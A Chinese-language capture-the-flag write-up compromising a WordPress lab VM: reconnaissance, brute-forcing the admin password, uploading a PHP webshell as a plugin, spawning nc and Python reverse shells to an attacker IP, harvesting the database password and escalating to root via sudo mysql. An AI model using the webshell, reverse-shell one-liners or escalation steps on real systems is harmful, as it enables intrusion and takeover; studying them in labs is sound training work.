靶机下载地址:靶机下载
主机发现
通过nmap扫描得到主机IP地址
信息搜集
通过nmap对IP地址扫描,得到信息,只有80端口
然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80
扫描目录,发现是WordPress框架,但有很多重定向的url
于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip
需要通过burpsuite里面的proxy模块的options功能,将其响应头和响应体的ip替换
然后重新访问,就可以正常浏览了
然后访问WordPress管理员页面,/wordpress/wp-admin
,这里需要账号密码登录,尝试一下弱密码,不行,提示我们密码不正确,说明账号为admin
漏洞利用
密码采用burp爆破,爆破出密码为adam14,然后登陆进入后台,一般的WordPress获取shell有三种方式
第一种是通过Media上传shell文件,但需要特定的漏洞版本才行;
第二种是修改主题,嵌入代码,一般在404.php文件中添加shell代码,但是这里不能更新
第三种是通过添加自己写的插件上传
<?php
/*
Plugin Name: Webshell
Plugin URI: https://github.com/171/
Description: Wordpress Webshell for Pentest
Version: 1.0
Author: 123
Author URI: https://github.com/171/
License: https://github.com/171/
*/
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
由于上传需要zip压缩包,所以需要将1.php压缩为1.zip再上传,上传成功后需要激活
然后访问http://192.168.137.145/wordpress/wp-content/plugins/1.php?cmd=id
,发现可以得到了id:www-data
接下来查看本地的环境,有nc,python3,php,尝试反弹shell,这里可以用nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321
//在攻击主机上打开两个终端,分别监听 1234 和 4321 端口,得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果,
和python反弹,因为只有python3环境,需要使用python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.152",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
用/etc/passwd查看一下有哪些用户,发现有wpadmin,然后切换到home目录下查看用户里面的内容,发现没有权限
权限提升
接着尝试通过利用登录的密码切换账户,居然成功了
查看local.txt,应该是第一个flag,还需要获取root权限,通过sudo -l发现该用户执行数据库时不需要密码,就能得到root权限
但是数据库密码还需要获取,因为WordPress的目录下有个config.php,所以数据库密码应该在那个文件里面,返回刚才得到的路径查看数据库密码 Wp_Admin#123
登录mysql之后,里面有个system指令可以执行命令
执行system bash,查看proof.txt得到flag
成功反弹获取shell之后切换交互式shell
通过反弹得到shell,但并不是交互式shell,可以通过下面方式升级Full TTY Shell,此升级方案只适用于bash.因为这里我使用的是kali linux 要把把zsh切换为bash.
首先使用echo $SHELL查看当前shell的类型,接着使用chsh -s /bin/bash进行更改,更改后需要进行重启,重启弘我们再看shell类型发现已经是bash了
继续通过之前python反弹的shell,进行如下操作
1.输入Ctrl+Z
2.输入stty raw -echo
3.输入fg
4.输入export SHELL=/bin/bash
5.输入export TERM=screen
6.输入stty rows 38 columns 126
7.输入reset
通过以上操作后命令可以进行自动补全等功能